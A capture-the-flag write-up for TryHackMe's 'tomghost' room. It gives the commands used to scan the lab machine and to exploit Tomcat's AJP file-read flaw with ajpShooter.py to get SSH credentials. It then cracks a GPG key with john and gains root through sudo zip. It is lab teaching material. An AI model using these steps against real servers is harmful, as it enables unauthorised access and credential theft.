tomghost

Identify recent vulnerabilities to try to exploit the system or read files that you should not have access to.

As the description says, it is an Easy room from tryHacMe. Though the initial access was easy, but the Privilege escalation part is quite hard and tricky.

Enumeration

1) First, masscan all port scan: masscan -e eth0 -p 1-65535 --rate=10000 -v 10.10.187.215

Discovered open port 22/tcp on 10.10.187.215                                   
Discovered open port 8080/tcp on 10.10.187.215                                 
Discovered open port 53/tcp on 10.10.187.215                                   
Discovered open port 8009/tcp on 10.10.187.215

2) Now nmap scan: nmap -p 22,8080,53,8009 -sC -sV -v 10.10.187.215

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (EdDSA)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache Tomcat/9.0.30

The Tomcat 9.0.30 here, has an arbitrary file read vulnerability: exploit-db

3) Visiting the webpage at port 8080 confirms the version:

4) Found a tool to read sensitive files using tomcat vulnerability: GitHub Link

5) Set up the tools with execute permission:

Now run the tool: ./ajpShooter.py http://10.10.187.215:8080 8009 /WEB-INF read

• IP:8080 : tomcat running in this address

• 8009 : enumerating the Jserv service running in port 8009

• /WEB-INF : querying web information

• read : read and show the info

Found an /index.txt

6) Tried to read a common file:

./ajpShooter.py http://10.10.187.215:8080 8009 /WEB-INF/web.xml read

There found a name:password combination

Exploitation

7) Easily exploited using ssh: ssh skyfuck@10.10.187.215

8) The user.txt is in another user directory

Privilege escalation

9) Failed attempt

• can not list the user with sudo access : sudo -l

• /etc/shadow and /etc/passwd has no write access

• can not download and run any automation tool inside the machine

• skyfuck has no sudo access but merlin has

10) I have failed using other way to enumerate. But I found that there is pgp (Pretty Good Privacy) file and ASCII armour

11) First trying to import the ASCII armour as a key: gpg --import tryhackme.asc then trying to decrypt the pgp: gpg --decrypt credential.pgp (But this also asks for passphrase)

12) Downloading the .asc in attack box and try to convert. This gives me a hash

1. Download: scp skyfuck@10.10.187.215:tryhackme.asc /tmp

2. Convert: /opt/john/gpg2john /tmp/tryhackme.asc > /tmp/hash

13) Cracking the hash: john --format=gpg --wordlist=/usr/share/wordlists/rockyou.txt /tmp/hash

14) Now paste it to the another running shell of the machine. This shows merlin's password

15) I can log in as merlin : su merlin

and merlin has sudo access: sudo -l (to zip)

16) GTFOBins shows the payload using zip. I have modified a little and this gives me root access